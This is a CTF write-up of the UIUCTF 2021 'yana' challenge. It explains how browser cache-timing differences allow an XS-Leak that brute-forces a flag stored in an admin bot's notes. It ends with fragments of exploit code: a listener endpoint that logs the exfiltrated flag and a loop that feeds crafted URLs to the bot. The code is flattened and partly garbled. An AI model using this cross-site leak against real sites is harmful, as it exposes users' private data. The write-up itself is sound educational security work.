It is said that the loading speed of the resource file is different from the first time the browser loads the resource file and from the second time. The reason is that the second time the resource file is fetched, the image cache is fetched from disk, not by requesting it from the web server.
The photo on the right is when the image is first loaded, and the photo on the left is when the image is loaded the second time. If you look at the time, you can see that there is a difference by the ratio of 0ms : 48ms. So how can use this to link with XS-Leak?
Exploit (Web) UIU CTF 2021 - yana [342 pts]
The challenge is leak the flag and using the cache probing and xs-leak :)
If you went to the challenge, you can see a notepad function as above. I checked, the function as top is to save a content and function as bottom is to search for saved memo.
So, I saved a memo as pocas and not_pocas. I did a saerch for pocas on the left and searched for asdf on the right after saved the memo.
OMG, I did a search and came up with surprising result!! It was immediately returned with a different color image!! I can know an important information here.
Information
If you search for a cunrently saved memo, a green image appears.
If you search for a unsaved memo, a red image appears.
/* NOTE: this is the script that the admin bot runs to visit your provided URL it not required to solve the challenge, but is provided for reference & for you to help test/debug your exploit */
Read the /flag.txt file and save it to FLAG variable.
Running a chrome instance using playwright-chromium.
Go to https://chal.yana.wtf, save FLAG in the note, and access the URL that we entered as an administrator. ( Important )
We learned a lot from our analysis !!
In bot.js, flags are stored in notes. Also we know the flag format. ( uiuctf{[a-z0-9_]} ). That is, we can brute force using uiuctf{. This is where ‘Cache Probing’ is used. I know that when I search for a value contained in a note, a green image appears.
Then, if we retrieve the value contained in the note, the browser loads a green image. At this time, since it is loaded for the first time, it will be cached on disk. At this time, if we retrieve the green image one more time, the image can be loaded much faster than the first time since the cache is already saved.
First of all, this is the exploit code that sends a query that is not saved in the memo. In the above situation, the browser will load a red image. Then the green image will take a lot of time because it is the first to load.
Let’s check it out.
Nice, When sending a query that does not contain it, it took about 43s?43ms.
@app.route('/flag') defindex(): global FLAG, condition FLAG = request.args.get('flag') condition = False log.info("Success!") log.info(f'The flag is : {FLAG}')
return"Success"
defsend_bot(): global condition for char in char_list: if condition: bot = remote(bot_url, bot_port, level='error' ) url = poc_url + FLAG + char.encode('utf-8')
#log.info(f'Send url : {url}') sleep(1) bot.sendlineafter(b'Please send me a URL to open.\n', url) else: exit(0)